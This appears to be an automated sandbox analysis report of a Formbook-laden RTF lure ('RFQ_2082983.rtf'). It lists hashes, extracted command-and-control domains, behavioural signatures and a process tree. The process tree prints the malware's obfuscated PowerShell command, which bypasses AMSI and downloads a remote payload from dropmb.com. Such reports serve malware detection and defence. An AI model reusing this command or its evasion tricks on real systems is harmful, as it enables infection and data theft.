Analysis
-
max time kernel
151s -
max time network
161s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
31-01-2022 07:25
Static task
static1
Behavioral task
behavioral1
Sample
RFQ_2082983.rtf
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
RFQ_2082983.rtf
Resource
win10-en-20211208
General
-
Target
RFQ_2082983.rtf
-
Size
2.2MB
-
MD5
5626f64c57491d2f2d614c47da4b9063
-
SHA1
1a248103d388028fce134bb9cf3f8051b56f6b50
-
SHA256
153faf944590ffc174faee0c67b6f4a47f186d016881ce3441542f7a36ab8b82
-
SHA512
653c0c288940672b983504b7f522feae7af471325d0a398d7444d4ce1c66343d113e8a1e9bf51246e3a4e69a166707c7aa8bd2fb7e16e8274c782fe0be23987c
Malware Config
Extracted
formbook
4.1
dt23
acresyetthrow.xyz
botoxforchronicmigraine.com
bulletproofrzr.com
curiaegroup.com
7seasvisas.com
dofastig.com
xu6gfskoedlj.xyz
indoorindia.com
cinejunky.xyz
projectsunshine.info
wefmans.com
gv3f9asm.xyz
couriergbblogistics.com
tcd-ussf.com
ssmgk.com
beeyou-photography.com
agulhanopalheirobrecho.xyz
damlacreative.xyz
businessinvestmentcanada.today
makingwavesbyterra.com
foresightfundingconsultants.com
fortbendisdstudenthomepage.com
suip.online
higherlevelcontent.com
dingzhiwuhu.com
sans-sanity.com
nashvillesportsauthority.com
clarvazatoareaana.com
xn--malagueamg-z9a.com
datapendukung.com
europetopjob.com
hostingboliviano.com
butdex.online
azbrotherskoreadates.com
siguemipaso.com
rcthanenorth.com
peramidtown.com
hcmslyj.com
bikepackig.com
myparty-store.com
buildngs.com
comptesbancaireswebfr.com
aankoopbegeleider.com
wolfcapitalinvestment.com
mydreamstates.com
makelittlerockgreatagain.com
agripsychbeam.com
thoughtsofaith.com
modepride.one
odocos.com
taylormadewoodwork.com
chevlot.com
footiclub.com
allai-stekt.com
completeinstructoracademy.com
kailo-listjournal.com
oregonspecialistgroup.com
poscyprus.com
awfencestaining-tx.com
qs009.com
tuyauhorizontalcoud.com
atonmnicxwallet.com
godrejriviera-ambivali.info
1michiganlightning.com
shshkj.com
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
Powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1900 988 Powershell.exe -
Formbook Payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/1480-76-0x0000000000400000-0x000000000042F000-memory.dmp formbook behavioral1/memory/1540-83-0x00000000000C0000-0x00000000000EF000-memory.dmp formbook -
Blocklisted process makes network request 2 IoCs
Processes:
Powershell.exeflow pid process 6 1900 Powershell.exe 8 1900 Powershell.exe -
Drops file in System32 directory 1 IoCs
Processes:
Powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk Powershell.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
Powershell.execalc.execontrol.exedescription pid process target process PID 1900 set thread context of 1480 1900 Powershell.exe calc.exe PID 1480 set thread context of 1404 1480 calc.exe Explorer.EXE PID 1540 set thread context of 1404 1540 control.exe Explorer.EXE -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE -
Modifies registry class 64 IoCs
Processes:
WINWORD.EXEdescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1608 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
Powershell.execalc.execontrol.exepid process 1900 Powershell.exe 1900 Powershell.exe 1900 Powershell.exe 1480 calc.exe 1480 calc.exe 1540 control.exe 1540 control.exe 1540 control.exe 1540 control.exe 1540 control.exe 1540 control.exe 1540 control.exe 1540 control.exe 1540 control.exe 1540 control.exe 1540 control.exe 1540 control.exe 1540 control.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 1404 Explorer.EXE -
Suspicious behavior: MapViewOfSection 5 IoCs
Processes:
calc.execontrol.exepid process 1480 calc.exe 1480 calc.exe 1480 calc.exe 1540 control.exe 1540 control.exe -
Suspicious use of AdjustPrivilegeToken 32 IoCs
Processes:
Powershell.execalc.exeExplorer.EXEcontrol.exedescription pid process Token: SeDebugPrivilege 1900 Powershell.exe Token: SeIncreaseQuotaPrivilege 1900 Powershell.exe Token: SeSecurityPrivilege 1900 Powershell.exe Token: SeTakeOwnershipPrivilege 1900 Powershell.exe Token: SeLoadDriverPrivilege 1900 Powershell.exe Token: SeSystemProfilePrivilege 1900 Powershell.exe Token: SeSystemtimePrivilege 1900 Powershell.exe Token: SeProfSingleProcessPrivilege 1900 Powershell.exe Token: SeIncBasePriorityPrivilege 1900 Powershell.exe Token: SeCreatePagefilePrivilege 1900 Powershell.exe Token: SeBackupPrivilege 1900 Powershell.exe Token: SeRestorePrivilege 1900 Powershell.exe Token: SeShutdownPrivilege 1900 Powershell.exe Token: SeDebugPrivilege 1900 Powershell.exe Token: SeSystemEnvironmentPrivilege 1900 Powershell.exe Token: SeRemoteShutdownPrivilege 1900 Powershell.exe Token: SeUndockPrivilege 1900 Powershell.exe Token: SeManageVolumePrivilege 1900 Powershell.exe Token: 33 1900 Powershell.exe Token: 34 1900 Powershell.exe Token: 35 1900 Powershell.exe Token: SeDebugPrivilege 1480 calc.exe Token: SeShutdownPrivilege 1404 Explorer.EXE Token: SeShutdownPrivilege 1404 Explorer.EXE Token: SeShutdownPrivilege 1404 Explorer.EXE Token: SeShutdownPrivilege 1404 Explorer.EXE Token: SeShutdownPrivilege 1404 Explorer.EXE Token: SeShutdownPrivilege 1404 Explorer.EXE Token: SeDebugPrivilege 1540 control.exe Token: SeShutdownPrivilege 1404 Explorer.EXE Token: SeShutdownPrivilege 1404 Explorer.EXE Token: SeShutdownPrivilege 1404 Explorer.EXE -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 1608 WINWORD.EXE 1608 WINWORD.EXE -
Suspicious use of WriteProcessMemory 27 IoCs
Processes:
EQNEDT32.EXECmD.exePowershell.exeExplorer.EXEcontrol.exeWINWORD.EXEdescription pid process target process PID 672 wrote to memory of 1048 672 EQNEDT32.EXE CmD.exe PID 672 wrote to memory of 1048 672 EQNEDT32.EXE CmD.exe PID 672 wrote to memory of 1048 672 EQNEDT32.EXE CmD.exe PID 672 wrote to memory of 1048 672 EQNEDT32.EXE CmD.exe PID 1048 wrote to memory of 904 1048 CmD.exe cscript.exe PID 1048 wrote to memory of 904 1048 CmD.exe cscript.exe PID 1048 wrote to memory of 904 1048 CmD.exe cscript.exe PID 1048 wrote to memory of 904 1048 CmD.exe cscript.exe PID 1900 wrote to memory of 1480 1900 Powershell.exe calc.exe PID 1900 wrote to memory of 1480 1900 Powershell.exe calc.exe PID 1900 wrote to memory of 1480 1900 Powershell.exe calc.exe PID 1900 wrote to memory of 1480 1900 Powershell.exe calc.exe PID 1900 wrote to memory of 1480 1900 Powershell.exe calc.exe PID 1900 wrote to memory of 1480 1900 Powershell.exe calc.exe PID 1900 wrote to memory of 1480 1900 Powershell.exe calc.exe PID 1404 wrote to memory of 1540 1404 Explorer.EXE control.exe PID 1404 wrote to memory of 1540 1404 Explorer.EXE control.exe PID 1404 wrote to memory of 1540 1404 Explorer.EXE control.exe PID 1404 wrote to memory of 1540 1404 Explorer.EXE control.exe PID 1540 wrote to memory of 2016 1540 control.exe cmd.exe PID 1540 wrote to memory of 2016 1540 control.exe cmd.exe PID 1540 wrote to memory of 2016 1540 control.exe cmd.exe PID 1540 wrote to memory of 2016 1540 control.exe cmd.exe PID 1608 wrote to memory of 1688 1608 WINWORD.EXE splwow64.exe PID 1608 wrote to memory of 1688 1608 WINWORD.EXE splwow64.exe PID 1608 wrote to memory of 1688 1608 WINWORD.EXE splwow64.exe PID 1608 wrote to memory of 1688 1608 WINWORD.EXE splwow64.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RFQ_2082983.rtf"2⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122883⤵
-
C:\Windows\SysWOW64\control.exe"C:\Windows\SysWOW64\control.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\WINDOWS\syswow64\calc.exe"3⤵
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\CmD.exeCmD.exe /C cscript %tmp%\Client.vbs AC2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp\Client.vbs AC3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like '*Context') {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1);$88599686864747748383993984=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,48,56,49,59,36,65,68,48,48,70,57,70,49,85,67,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,65,68,48,48,70,57,70,49,85,67,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,100,114,111,112,109,98,46,99,111,109,47,102,105,108,101,115,47,56,48,98,102,53,52,101,50,53,102,48,53,56,99,101,99,54,49,51,54,50,55,55,100,52,50,102,100,56,54,53,51,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,65,68,48,48,70,57,70,49,85,67,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,65,68,48,48,70,57,70,49,85,67,4